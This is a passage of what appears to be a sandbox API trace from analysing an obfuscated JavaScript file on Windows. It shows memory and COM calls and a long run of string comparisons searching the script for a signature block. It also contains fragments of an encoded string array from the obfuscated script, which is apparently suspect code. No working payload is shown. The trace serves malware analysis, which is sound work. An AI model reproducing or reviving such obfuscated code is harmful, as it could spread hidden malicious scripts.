sK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0046.420] realloc (_Block=0x26dfd0, _Size=0x96d0) returned 0x26dfd0
	[0046.420] ??2@YAPEAX_K@Z () returned 0xdf0b0
	[0046.421] free (_Block=0x26dfd0) 
	[0046.421] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.421] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.421] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.421] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.421] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.421] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.421] CoUninitialize () 
	[0046.421] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.421] CloseHandle (hObject=0x140) returned 1
	[0046.421] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0046.421] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0046.421] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0046.421] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0046.421] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0046.422] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0046.422] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0046.422] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0046.422] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.422] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.422] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0046.422] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0046.422] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.422] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0046.422] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.422] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0046.422] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0046.422] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.422] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0046.422] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0046.422] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0046.422] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0046.422] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0046.422] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.422] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.422] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0046.422] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0046.422] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0046.422] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0046.422] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0046.422] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.422] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.422] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0046.423] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0046.423] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0046.423] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.423] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0046.423] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0046.423] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0046.423] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0046.423] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0046.423] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0046.423] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0046.423] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.423] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0046.423] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.423] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.423] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0046.423] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0046.423] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0046.423] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.423] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0046.423] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0046.423] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.423] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0046.423] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0046.423] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.423] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.423] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0046.423] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0046.423] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0046.423] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0046.423] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0046.423] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0046.423] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0046.423] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0046.423] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.423] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0046.424] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.424] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.424] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0046.424] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0046.424] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.424] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0046.424] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.424] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.424] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0046.424] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.424] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0046.424] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0046.424] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0046.424] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.424] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0046.424] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0046.424] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0046.424] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0046.424] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0046.424] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0046.424] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0046.424] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0046.424] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.424] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0046.424] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0046.424] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0046.424] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0046.424] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.424] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0046.424] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0046.424] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0046.424] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0046.424] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0046.424] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.424] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0046.425] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0046.425] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.425] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0046.425] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0046.425] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.425] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.425] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.425] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0046.425] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0046.425] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0046.425] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0046.425] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.425] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0046.425] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.425] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0046.425] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0046.425] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.425] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.425] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0046.425] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0046.425] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0046.425] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0046.425] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0046.425] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0046.425] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.425] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0046.425] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.425] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0046.425] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0046.425] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.425] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.425] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0046.425] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0046.425] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0046.425] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0046.425] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0046.426] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.426] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0046.426] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.426] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0046.426] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.426] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.426] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0046.426] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0046.426] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0046.426] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0046.426] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0046.426] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0046.426] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0046.426] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0046.426] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0046.426] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0046.426] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0046.426] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0046.426] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.426] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.426] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0046.426] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0046.426] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.426] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
